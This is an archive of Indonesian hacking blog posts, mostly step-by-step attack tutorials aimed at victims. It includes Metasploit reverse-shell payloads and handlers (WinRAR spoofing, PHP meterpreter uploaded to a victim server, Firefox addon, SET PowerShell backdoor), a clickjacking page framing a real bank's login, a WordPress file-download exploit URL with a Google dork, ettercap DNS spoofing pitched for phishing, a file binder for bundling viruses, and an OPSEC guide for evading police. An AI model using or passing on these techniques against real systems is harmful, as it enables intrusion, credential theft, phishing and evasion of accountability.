Tampilkan postingan dengan label Hacking. Tampilkan semua postingan
Tampilkan postingan dengan label Hacking. Tampilkan semua postingan

Rabu, 06 Januari 2016

Rakabulle File Binder


Catatan Kali ini saya bahas Rakabulle
Rakabulle adalah tool FileBinder

Tool ini memungkinkan kalian untuk bind multi files / program bersamaan, dan mengesekusi file bersamaan

jadi beberapa files di jadikan dalam 1 program. think about WinRAR,tapi winrar tidak dengen mengeksekusi.

lengkap nya bisa lihat


english :
What is a file binder? In few words a file binder is a tiny tool which allows merging any kind of files in a single application.
When you execute the application, all previous merged files will be extracted to a temporary location then be executed normally.
Winrar for example propose a kind of function called SFX for Self Extraction Package, the only difference is that the binder doesn’t show any dialog. It will extract and execute the files in transparency.


gambar diatas, file / program yang di input atau drop
input bisa berupa files atau program apa aja

coba bayangkan jika banyak virus yang di jadikan kedalam satu program, dan ketika program tersebut di jalankan..
secara bersamaan ratusan virus itu juga ikut dijalankan :)

**kemarin sih percobaan input nya payload metasploit. and Work !!


beberapa fungsi Rakabulle
- File binder, auto file extractor and executor.
- REM (Remote Code Execution), Execute code (Plugins) in target process (Explorer or Internet Explorer)
- Support 32 and 64 Process.
- The application is a 32bit Application (Soon we will compile the 64bit version)
- Support UPX compression for the stub (Without compression stub size is about 38KiB using pure Windows API no extra libraries; with compression stub size is approximately 16KiB) The UPX compression doesn’t change the way the application work only the final size.
- Support Windows startup.
- Doesn’t require administrative privileges.
- Plugins and File list support drag n drop.
- Support plugins with an open source example.
- The stub and the builder are coded using Unicode encoding.
Share:

Sabtu, 27 September 2014

Install Linux Debian di Android ( ARM )

Lama banget,aku udah jarang posting ^ ^

hari ini aku mau share, cara install LinuxARM di hp Android..
Kalo biasa nya kita Install android di Linux. skarang kita beda ^ ^

Mungkin yg pernah main Raspberry Pi, tau ya apa itu ARM Processor Architecture

Selain di MiniPC , Nano-ITX , Pico-ITX.
di Handphone Jaman skarang juga sudah bnyak yang mengunakan ARM Processor

kita akan menginstall LinuxARM ini
hanya dengan script installer 3.7mb


Hal yang perlu di perhatikan
- Rooted Acces
- Kernel supports mounting loop disks
- Kernel supports the ext2, ext3, or ext4 file systems
- CPU architecture  ARM (little endian) or i386 (ia-32 bit)
- 128 Mb of RAM atau lebih
- 512 Mb of free space on SD card
- Internet connection ( Kalo bisa yg cepet :p )
- Terminal app installed

WARNING: This stuff is checked on different hardware.
The kit should run with stock factory firmware, but customized ROMs should work also. Nevertheless: root access always includes the chance to do something very fatal to your device. Always watch, read and dig the error messages (if any) and re-think twice before doing something nasty.

Ok, Lets go..
Pertama kita download dulu script installer nya ( 3.71Mb )
Download
Pasti bingung, kok file nya jpeg ? Jangan Kaget :p

lanjut dengen meng'execute file tadi


Setelah proses Extracting selsai, akan ada output macam ini


Disana ada pilihankan ? ane pilih 0l ( 0+L )
arti nya install loop file nya 512mb, dan OS nya Ubuntu Lucid
saat prosses pembuatan file loop. itu lama banget
sebenernya tergantung dari kecepatan Sdcard yg kalian pakai


Ok, Next, Creating filesystem, disarankan berada di daerah yg terjangkau WiFi ^ ^

Setelah hal diatas selsai, akan ada output macam ini..

Sampai sini,hampir selsai
*Perhatikan Tulisan yg dipaling bawah, anda diminta untuk melakukan mounting ke filesystem yg tadi anda buat untuk mengakses nya
ketik "deb" di terminal, dan kemudian "apt-get update"
kalau bisa sekalian di upgrade "apt-get upgrade"


Sampai Step ini..bisa dibilang selsai.

untuk keluar dari session linux itu, ketik aja "exit"
kemudian kita umount filesystem nya dengan "deb u"
jika ingin mengkases nya kembali, enter aja "deb"


cara install linux di android,dengan cara ini..asli stabil
ini bukti nya 


Untuk Tutorial Lengkap nya versi Video
Download disini

Ok, semoga berhasil ya install nya ;)
mohon komentar nya dibawah,untuk Testimonial



Share:

Rabu, 04 Juni 2014

WinRAR Filename Spoofing with Metasploit


Belom lama ini dunia lagi ramai dengan "Winrar File Spoofing"
sampai-sampai metasploit membual module exploit nya..

http://www.exploit-db.com/exploits/32752/

Saya pun tertarik untuk mencoba nya ^ ^
Menurut gw ini cukup bagus ya,buat memanipulasi trap ( jebakan ) ke victim
bisa lolos dari Anti Virus ( entahlah, gak banyak saya test ke AV lain )

Requiment :
Metasploit v4.9.2  atau lebih
more info about metasploit v4.9.2 at https://community.rapid7.com/docs/DOC-2736


ok..mari kita coba
Open your metasploit console


msf > use exploit/windows/fileformat/winrar_name_spoofing
msf > set filename [ Name_File ]
msf > set spoof [ File_Trap ]

msf > set payload windows/meterpreter/reverse_tcp
msf > set lhost [ your IP ]
msf > set lport

Kita buat file nya dengan perintah "exploit"
file berada di directory /root/.msf4/local/



ok,next kita hanya tinggal kasih ke victim :)

Jalankan exploit multi handler

msf > use exploit/multi/handler

untuk melisten/ menerima koneksi dari target via exploit yg tadi dibuat



and..ketik si victim membuka file tersebut,
**damm ,you got meterpreter session

Share:

Senin, 02 Juni 2014

Fixed Failed to Connect to the Database Metasploit

Mungkin dari beberapa orang yg baru belajar Metasploit, pernah ngalamain error database metasploit seperti ini
Failed to connect to the database: could not connect to server: connection refused


Udah Jelas banget dari Pesan nya, Database nya gak connected :)

Ok, Bgini cara Fix nya
1. Pastikan service postgresql, kalian berjalan
2. cek file config database metasploit nya ( /opt/metasploit-4.4.0/config/database.yml )


Jalankan Service Postgresql nya.
$ service postgresql start

Masih ada error ??
bisa jadi itu karna masalah config dengan dengan database msf kalian,
dan ini cara untuk setup new database msf dengan postgresql

Root@Ganteng:# su - postgres
postgres@localhost~$ createuser [Nama User] -P
postgres@localhost~$ [Enter password]
postgres@localhost~$ Validate password
postgres@localhost~$ Shall the new role be a superuser? n
postgres@localhost~$ Shall the new role be allowed to create databases? n
postgres@localhost~$ Shall the new role be allowed to create new roles? n
postgres@localhost~$ createdb --owner=[Nama User] [Name_Database]
postgres@localhost~$ exit

setelah membuat user di posgresql
next kita membuat file configure database Metasploiut nya.
kalian bisa liat contoh file nya di
"/usr/share/metasploit-framework/config/database.yml.example"

edit aja langsung itu file example nya..


Input data-data nya sesuai yg tadi dibuat di postgresql
Kemudia save

dan rename dari "database.yml.example" to "database.yml"



Ok,Next... Buka msfconsole



Jika masih belum connect,coba dengan meng'connectkan langsung di Metasploit nya
msf > db_connect NamaUser:Passwd@127.0.0.1:5432/name_database



Done..
Share:

Minggu, 23 Februari 2014

Clickjacking Attack

Apa itu Clickjacking?
Clickjacking pertama kali di perkenalkan oleh Jeremiah Grossman dan Robert Hansen pada tahun 2008.
Clickjacking adalah salah satu contoh trick pengambilan data,dengan modus penipuan.
Trick ini berpotensi mengirim perintah yang tidak sah atau mengungkapkan informasi rahasia sementara korban berinteraksi pada halaman web yang tampaknya tidak berbahaya.

Untuk lebih jelas nya..Perhatikan gambar di bawah






Setelah korban berselancar di halaman web fiktif , ia berpikir bahwa ia berinteraksi dengan user interface terlihat, tetapi efektif ia melakukan tindakan pada halaman tersembunyi . Karena halaman tersembunyi adalah halaman otentik , penyerang dapat menipu pengguna agar melakukan tindakan yang mereka tidak pernah dimaksudkan untuk melakukan melalui " ad hoc " posisi elemen dalam halaman web .

Kekuatan dari metode ini adalah karena fakta bahwa tindakan yang dilakukan oleh korban berasal dari halaman web target yang otentik ( tersembunyi tapi otentik ) . Akibatnya beberapa perlindungan anti - CSRF , yang digunakan oleh para pengembang untuk melindungi halaman web dari serangan CSRF , bisa dilewati


Bagaimana cara kerja Clickjacking tersebut?
Untuk melaksanakan jenis teknik ini penyerang harus membuat sebuah halaman web yang tampaknya tidak berbahaya contoh situs Clound.COM dan menyisipkan halaman yang akan diserangnya contoh: TARGET.COM
Setelah itu, penyerang mengajak korban untuk mengunjungi situs Clound.COM untuk memaksa korban melakukan "klik" pada situsnya dan tanpa sadar melakukan "klik" di situs Clound.COM maka si korban sudah melakukan klik-an pada situs TARGET.COM



Sample Clickjacking in Mandiri Ibank
Dalam serangan ini kita dapat mencoba apakah sebuah situs dapat dieksploitasi Clickjacking menggunakan HTML tags <iframe>

kita bisa membuat code dengan codingan html di bawah ini
<html>
<title>
 Clickjacking
</title>
<style type="text/css">
<!--
body    {background: #D7E7F5  no-repeat fixed center;}
       
-->
</style>
<center>
    <h4>    DUNIA IMAJINASI<br>
        Untuk Melanjutkan layanan kami, anda perlu persetujan account bank anda<br>
        1.Pastikan anda login dengan Account Mandiri IBank<br>
        2.CLICK DOWNLOAD<br>
        ANDA AKAN MENDAPAT File YANG ADA INGINKAN<br>
    </h4>
    </h2>
        CATATAN: KOLOM SUDAH DIPRIVACY HARAP PASTEKAN DENGAN HATI-HATI !
    </h2>
</center>
<form action="http://devilzc0de.org/">
<input align="left" style="position:absolute;top:230px;left:660px" name="Rekening" value=""><br>
<input style="position:absolute;top:275px;left:660px" name="Rekening" value=""><br>
<button style="position:absolute;top:320px;left:700px">Download</button>
</form>
<iframe src="https://ib.bankmandiri.co.id/" style="position:absolute;width:800px;height:500px;top:90px;left:270px;opacity:0.5" scrolling="no" frameborder="none">
</iframe>
</html>

Pada nilai opacity saya mengganti nilai jadi 0.5 agar lebih mudah mengatur letak tombol. 
Ubah nilai opacity menjadi 0 agar frame dari situs target tidak kelihatan.

Well,itu adalah contoh demo dari Clickjacking




Kelebihan Clickjacking
-Walaupun situs tersebut menggunakan SSL,Clickjacking tidak terpengaruh dengan hal itu.
-Tidak terpengaruh dengan CSRFtoken.

Cara menangani Clickjacking
Server Side Protection
#Frame Busting / Framekiller
yaitu dengan menyisipkan code javascript untuk melindungi halaman dari <iframe> tags melalui situs lain/browser.

<style> html{display:none;} </style>
<script>
   if(self == top) {
       document.documentElement.style.display = 'block';
   } else {
       top.location = self.location;
   }
</script>
Server & Client Side Protection
#X-Frame-Options
X-Frame-Options adalah http header yang belum lama direlease oleh Internet Engineering Task Force (IETF) untuk melindungi server dari Clickjacking.
Ada 3 nilai valuenya
-Deny = tidak memperbolehkan
-Sameorigin = hanya situs itu sendiri
-Allow-from = diperbolehkan dari beberapa situs yang telah diijinkan oleh server.




Link referensi
http://en.wikipedia.org/wiki/Clickjacking
https://www.owasp.org/index.php/Testing_for_Clickjacking_(OWASP-CS-004)
devilzc0de - KotoM

Share:

Selasa, 31 Desember 2013

Wordpress wp-FileManager Local File Download Vulnerability

Author: ByEge
Download: http://wordpress.org/extend/plugins/wp-filemanager/
Vuln. Plat.:  Web Application
Test Platform :  Linux
==============================================


Exploit Note :
In order for this to work, the "Allow Download" setting must be checked in the FileManager's settings.

Google Dorks :
inurl:wp-content/plugins/wp-filemanager/

Test :
http://server/wp-content/plugins/wp-filemanager/incl/libfile.php?&path=../../&filename=wp-config.php&action=download


Oke,sekian dari Clound


Share:

Melindungi Website dari serangan Vuln Umum

Postingan saya kali ini tentang empat jenis serangan web yang umum di gunakan Attacker untuk melakukan defacement.

XSS, SQL injection, RFI dan LFI. Sebagian besar kesalahan terjadi pada pemrograman
yang memungkinkan attacker untuk dapat menyusup ke dalam website.


 1.Cross Site Scripting

Cross Site Scripting adalah jenis celah yang digunakan oleh attacker untuk menyuntikkan kode ke halaman
web yang rentan terhadap serangan ini. Jika sebuah situs rentan terhadap cross site scripting, attacker
kemungkinan besar akan mencoba untuk menyuntikkan situs dengan javascript berbahaya atau mencoba scam pengguna dengan menciptakan bentuk halaman web yang hampir sama untuk mendapatkan informasi.


Example:
http://www.contoh.com/find.php?all=">

*Solusi (javascript) :
function RemoveBad(strTemp) {
    strTemp = strTemp.replace(/\<|\>|\"|\'|\%|\;|\(|\)|\&|\+|\-/g,"");
    return strTemp;
}



 2.SQL Injection
     Login Form Bypassing

Berikut adalah contoh kode yang dapat kita bisa bypass:

index.html file:
<form action="login.php" method="POST" />
<p>Password: <input type="text" name="pass" /><br />
<input type="submit" value="Authenticate" /></p>
</form>

login.php file:
<?php
// Contoh Kode
$execute = "SELECT * from database WHERE password = '{$_POST['pass'])";
$result = mysql_query($execute);
?>

Kita dapat bypass dengan menggunakan ' or '1=1', dan menjalankan "password = ''or '1=1'';".
Atau attacker dapat juga dapat menghapus database dengan menjalankan "' drop table database; --".

*Solusi :
Menggunakan mysql_real_escape_string
Contoh:
<?php
$badcode = "' OR 1 '";
$badcode = mysql_real_escape_string($badcode);
$message = "SELECT * from database WHERE password = "'$badcode'";
echo "what are doing nobs" . $message . ";
?>


3.Union SQL Injection

Union SQL injection adalah ketika pengguna menggunakan perintah UNION. Memeriksa celah dengan menambahkannya
di akhir url "sebuah php?.id=". Jika terdapat error MySQL, situs tersebut kemungkinan besar
besar rentan terhadap UNION SQL Injection. Attacker melanjutkan menggunakan ORDER BY untuk menemukan kolom,
dan pada akhirnya, mereka menggunakan perintah UNION ALL SELECT.

Contoh :
http://www.contoh.com/index.php?id=1'
salah satu contoh pesan error:
Warning: mysql_fetch_row(): supplied argument is not a valid MySQL result resource in.....

Setelah muncul pesan error,maka attacker melanjutkan aksinya ;))
http://www.contoh.com/index.php?id=1 ORDER BY 1-- <-- No error.
http://www.contoh.com/index.php?id=1 ORDER BY 2-- <-- Muncul pesan error. Ini berarti hanya ada satu kolom
http://www.contoh.com/index.php?id=-1 UNION SELECT ALL version()-- <-- Memilih semua kolom dan menjalankan
                                                                      perintah version().

*Solusi :
Tambahkan sesuatu seperti di bawah ini untuk mencegah SQL injection Union:

$bug = "(delete)|(update)|(union)|(insert)|(drop)|(http)|(--)|(/*)|(select)";
$patch = eregi_replace($bug, "", $patch);



4. File Inclusion
    Remote File Inclusion dan Local File Inclusion

Remote File Inclusion adalah sebuah celah dimana situs mengizinkan attacker meng-includ file dari luar server.
Local File Inclusion adalah sebuah celah dalam situs dimana attacker dapat mengakses semua file di dalam server
dengan hanya melalui URL.

Contoh kode yang vulnerable :
<?php
include($_GET['page']);
?>

Beberapa contoh serangan :
http://www.contoh.com/page.php?page=../../../../../etc/passwd            < LFI
http://www.contoh.com/page.php?page=http://www.site.com/evilscript.txt?  < RFI

Solusi :
Validate the input.
$page = $_GET['page'];
$allowed = array('index.php', 'games.php' 'ip.php');
$iplogger = ('ip.php');
if (in_array $page, $pages)) {
include $page {
else
{
include $iplogger
die("IP logged.");
}


Share:

Sabtu, 07 Desember 2013

dSploit Android Network Penetration Suite


Mungkin blom bnyak yang tau.. apa itu dSploit
dSploit adalah aplikasi Android yang berfungsi untuk analisa,mencari celah(vuln),sekaligus Pentesting yang ada di jaringan wifi


Software ini free,bisa di download langsung di sni
Official Website
Github link

mempunyai fitur/modul yang lebih komplit dengan apps sejenis lainnya Zanti, Droidsheep, dan Netspoof.



Berikut fungsi-fungsi dari dSploit :


1.WiFi Cracking
The WiFi scanner will show in green access points with known default key generation algorithms, clicking on them allows you to easily crack the key, supported models: Thomson, DLink, Pirelli Discus, Eircom, Verizon FiOS, Alice AGPF, FASTWEB Pirelli and Telsey, Huawei, Wlan_XXXX, Jazztel_XXXX, Wlan_XX, Ono ( P1XXXXXX0000X ), WlanXXXXXX, YacomXXXXXX, WifiXXXXXX, Sky V1, Clubinternet.box v1 and v2, InfostradaWifi.

2.RouterPWN
Launch the http://routerpwn.com/ service to pwn your router.

3.Trace
Perform a traceroute on target.

4.Port Scanner
A syn port scanner to find quickly open ports on a single target.

5.Inspector
Performs target operating system and services deep detection, slower than syn port scanner but more accurate.

6.Vulnerability Finder
Search for known vulnerabilities for target running services upon National Vulnerability Database.

7.Login Cracker
A very fast network logon cracker which supports many different services.

8.Packet Forger
Craft and send a custom TCP or UDP packet to the target, such as Wake On LAN packets.

9.MITM
A set of man-in-the-midtle tools to command&conquer the whole network.

10.Simple Sniff
Redirect target’s traffic through this device and show some stats while dumping it to a pcap file.

11.Password Sniffer
Sniff passwords of many protocols such as http, ftp, imap, imaps, irc, msn, etc from the target.

12.Session Hijacker
Listen for cookies on the network and hijack sessions.

13.Kill Connections
Kill connections preventing the target to reach any website or server.

14.Redirect
Redirect all the http traffic to another adtress.

15.Replace Images
Replace all images on webpages with the specified one.

16.Replace Videos
Replace all youtube videos on webpages with the specified one.

17.Script Injection
Inject a javascript in every visited webpage.

18.Custom Filter
Replace custom text on webpages with the specified one



Note:
untuk menjalankan apps ini harus menggunakan Os Android 2.3 ( Gingerbread ) keatas
dan pastikan device anda telah di root,

dSploit ini juga membutuhkan full install Busybox
PlayStore Link




Share:

Kamis, 29 Agustus 2013

Opsec For Hacker


Kali ane mau Perkenalin ke Kalian betapa Penting nya sebuah data Pribadi atau Personal Contact

posting'an ane kali ini,terinspirasi dari dokument Opsec..

Coba itu yang ikut-ikutan anonim,baca ini dulu..
gak lucu aja kalau digaruk polisi atau nongol di blog kongsingepet  - Jim Geovedi



"Opsec Untuk Pejuang Kebebasan
Karena Penjara hanya untuk Manusia bodoh"

Apa itu OpSec ?
OpSec adalah perlindungan terhadap data-data pribadi lo,identitas diri lo
lebih tepat adalah sebuah Penyamaran atau kamuflase


Kenapa lo butuh Opsec ?
-Sakit hati rasa nya kalo di tikung..
-Your friends will betray you..
-lo hanya perlu MENGACAU sekali aja..
maka Masalah akan DATANG,entah lambat,entah lebih cepat

dan ini cara yg tepat untuk Melindungi Diri lo



Opsec for a Hackers

Pengertian OpSec secara sederhana
-Menjaga kerahasian tentang Data" diri lo yang sebenar nya
-Simpan semua Rahasia dengan baik
-Keep Anonymous
-Berhati-hati..
-Kalem aja,dan tutup mulut lo
-Jadi Paranoid (Waspada)
-Selalu Ringakas..buang jauh-jauh Barang Bukti
-Gunakan Kamuflase


Rules
1: Jangan pernah cerita soal detail operasional
2: Jangan pernah bocorin rencana
3: Jangan percaya siapapun
4: Jangan mencampur Urusan Dunia nyata dengan Dunia Hacking lo
5: Jangan pernah beroperasi di rumah/ kantor/warnet/sekolah yang biasa
6: Jadi paranoid yang proaktif, jangan reaktif
7: Pisahkan kehidupan pribadi dan hacking FIGHTING
8: Jaga lingkungan personal supaya tidak tersusupi
9: Jangan mencari perhatian (sering show off )
10: Jangan membiarkan orang lain lebih berkuasa dari lo!


 Pelajaran dari Lulzsec





Never Trust Anyone
apa lagi dengan orang yg baru lo Kenal




Don’t use your personal Facebook account
to send defacement code to Public



Don’t use your real first name as your
username 



Don’t connect to your target directly from your
home IP address



Kalo lo melihat dan memahi tips diatas,nasip lo gak akan seperti orang-orang di bawah ini..




Kesimpulan..
Keep Anonymous Bro

Bagaimana Cara Menjadi Anonymous ?
-Bikin Identitas baru
  Bikin 3 Identitas..
1.Account/Nickname untuk bersosial di Jejaring Social
2.Account/Nickname untuk di forum-forum
3.Account/Nickname untuk Show Off

dan ketiga Account itu semua harus berbeda Nama,
dan jangan sekali-sekali ketiga account ini saling berhubungan

-Bikin Cerita pendukung untuk Identitas baru lo
(Sejarah,latar belakang,bukti pendukung identitas baru tersebut)

- Jangan Pernah tertukar antara Data Asli lo,dengan data Anonymous Lo..

- Jangan pernah share hal ini
    - Informasi tentang Lokasi
    - Cuaca
    - Waktu
    - Kejadian
    - Data Profiling


Panduan Anti Profiling
 - Informasi personal adalah Informasi penting
 - Jangan pernah menyertakan informasi personal
 - Jangan bahas informasi detail,seperti Jenis kelamin atau kemampuan fisik lo
 - Jangan bahas profesi,hobi,keterlibatan dalam partai politik atau kelompok lain nya
 - Jangan Bahas soal lingkungan,cuaca atau aktivitas politik
 - Jangan pernah bilang lo itu Anonymous




Lo bisa jadi Terkenal,. Lo bisa jadi Criminal
Tapi,.. lo gak bisa jadi Penjahat yg terkenal
RIP #Lulz



Kalo lo Ngehack,jangan Ngomong
kalo lo ngomong,jangan Nulis
Kalo lo nulis,jangan tanda tangan
Kalo lo Tanda tangan, Jangan Kaget ..!!





Full Video : #HITB2012 on Kuala Lumpur. Opsec (1:03:23 )


Download Versi PDF ( versi lengkap )

Read Online on SlideShare



Share:

Senin, 29 Juli 2013

Rooting Server with Metasploit Backconnect


apa kabar nya nih para pembaca..

oke,kali ini
ane mau share Cara Rooting Server dengan Metasploit,
dengan mengunakan php meterpreter

pertama kita buat terlebih dahulu payload php reverse_tcp,bagaima cara buat nya..
ketik aja di terminal :

$ msfpayload php/meterpreter/reverse_tcp LHOST=192.168.1.1 LPORT=6000 R > /root/Desktop/bekonek.php

oke,payload nya udah selsai dibuat dan berada di Desktop..
sekarang Upload itu Payload ke Server korban

anggap,saja kalian udah mengupload Bejak/Shell ke Server korban..
jadi bisa dengan mudah mengases file di server korban

jika sudah terUpload,
Jalankan exploit Multi handler..

> use exploit/multi/handler 
> set lhost 192.168.1.1
> set lport 6000
> set payload php/meterpreter/reverse_tcp
> exploit


jika exploit sudah di jalankan,kita hanya tinggal menjalankan Payload yg tadi di upload ke server korban

cukup dengan membuka melalui web browser..
melalui webbrowser dari kompi kalian dan akses ke server yang anda sudah upload payload

www.target.com/bekonek.php

dan server pun jatuh ke tangan kita



**Note : disini ane praktek di Jaringan Local,jadi IP nya 192.168.xx.xx
ini bisa juga di coba di IP public

oke,sekian dari ane..

Share:

Rabu, 10 Juli 2013

Exploit Windows with Firefox addons




halo semua,hari pertama bulan puasa.. apa kabar nih ?
Alhamdulillah,ane masih kuat untuk hari ini :D

kali ini ane mau share cara Exploit Windows dengan addons/Plugins Firefox Webbrowser
cara ini lumayan bagus kalau menurut ane,..

oke langsung aja cekidot...

jalankan Metasploit...

> use exploit/multi/browser/firefox_xpi_bootstrapped_addon

cek options yang harus kalian isi apa aja..


oke dahliat kan options nya,
di set sendiri aja om :v

next.. kalao udah semua di setting,jalankan exploit


dan ini tampilan saat korban mengakses jebakan kalian..





buat korban yakin dengan plugins kalian,agar terinstall di Firefox korban..
dan kalau sang korban memasang Plugins/addons kalian..
nah.. langsung dah kalian masuk ke stage Meterpreter



oke,sekian dari ane Clound A.K.A Muhammad Ridwan
ane mau ngucapin mohon maaf lahir batin..

bye.. sampai ketemu di postingan selanjut nya :D


Share:

Rabu, 03 Juli 2013

Changing Windows Password with Chntpw


oke,balik lagi sama ane Clound,
apa kabar semua nih ?

ane mau share tutorial cara reset password Administrator Windows
mungkin trick ini udah basi kali ya,karna udah banyak juga di internet


jadi kmaren itu ada temen ane yg dateng ke rumah,kata nya password laptop nya ada yg ganti..
ane langsung inget kalo di backtrack ini ada tool nama nya Chntpw.

jadi gak salah juga kan kita pelajarin lagi :) | apa lgi klo ada keperluan mendadak kaya temen ane ini

oke,langsung aja cekidot

pertama yg harus kita lakukan adalah mount partisi Windows nya,dan copy nama disk nya


next cari file "SAM"
file ini ada di directory /WINDOWS/system32/config/



kalo udah ketemu,
jalankan tool chntpw kalian :D

jalankan dengan syntax Seperti ini :
$  ./chntpw -i /media/883C2B473C2B301C/WINDOWS/system32/config/SAM



nah itu kan keluar pilihan, pilih 1 atau 9
pilih aja 1 Edit users data and Password



nah masukan nama user yang mau di ganti passwd nya..

simple kan ?

oke dah,sekian dari ane
Clound Carbelius

Share:

Senin, 17 Juni 2013

DnsSpoof with ettercap

halo :)
saya Clound,dan kali ini saya ingin share cara mesabotase domain di jaringan local dengan dnsspoof
contoh domain www.facebook.com,
anda bisa memindahkan domain ini ke IP local anda
penasaran cara nya ?

cekidot..
pertama kita harus mengedit file dns nya
nano /usr/local/share/ettercap/etter.dns

edit seperti gambar di bawah :



[domain] A [IP redirect]
*.domain.com  --> untuk sub domain

nah.. kalo sudah di setting file dns nya,save.. :D
saat nya kita beraksi dengan ettercap

ettercap -T -q -i [Network interface] -P dns_spoof -M arp // //


dan saat semua komputer yg berada satu jaringan dengan anda,
tidak bisa mengakses domain yg sudah anda spoof
dan dia akan ke redirect ke IP anda



*note
teknik seperti ini sangat bagus di gunakan untuk phising di jaringa local

oke thank's atas perhatian nya
Share:

Selasa, 11 Juni 2013

Backdoor Exploit without Virus with SET

halo semua ketemu lagi sama saya si Clound :D
kali ini saya mau share cara membuat bakdor exploit bebas virus dengan SET (Social Enginering Toolkit)

gak percaya no virus detect ??
nih SS,ane Scan pakai ABG 2011 (biar 2011 ane update tiap hari loh bro )


oke langsung aja..
buka tool nya,yang berada di derektori /pentest/exploits/set/
./set



kalo dah jalan tuh tool
pilih options 1,
yaitu : Social-Enginering Attack


next,pilih options 10
yaitu,Powershell Attack Vectors



next lagi, pilih options 1
Powershell Alphanumeric Shellcode Injector


nanti dia akan nagih IP kita,sebagai si pendengar
isikan dan IP ente sesuai network interface yg ente pakai

untuk Port nya ane pakai 445
karna 443,sudah terlalu mainstream

Do you want to start listener now ?
terserah ente dah mau exploit nya sekarang atau nanti-nanti aja

masukan architecture target. [x86/x64]

tunggu sampai prosses pembuatan Powershell nya selasi,

kalo tadi ente ketik Yes,secara otomatis jendela Metesploit akan terbuka..
menunggu sang korban mengklik bakdor nya,



btw,disini letak hasil Powershell nya om :D
/pentest/exploits/set/reports/


**lihat gambar di atas..
terdapat 2 file x64 dan x86
ambil satu saja sesuai architexture korban..
dan ganti extension nya dari .txt >> menjadi .bat


nah ini dia yg bkin binggung
pkoe bakdor ini (x86_powershell_injection.bat) ini mesti masuk ke PC korban
pikirin ajalah sendiri cara nya :v


pkoe diskenariokan bakdor udah masuk di PC korban.. :D
dan msf langsung dapet stage meterpreter \o/


kalo udah ada satu korban yg klik tuh bakdor
list siapa aja korban yg udah menjalankan bakdor nya : sessions -i
ketik : sessions -i [nmor antrian]


dan... kita masuk ke system nya dah om..
klo kita udah masuk session meterpreter di PC korban,itu pc udah ada di tangan kita om

terserah ente dah mau di apaan


oke dah.. sekian dari saya
Clound
Share: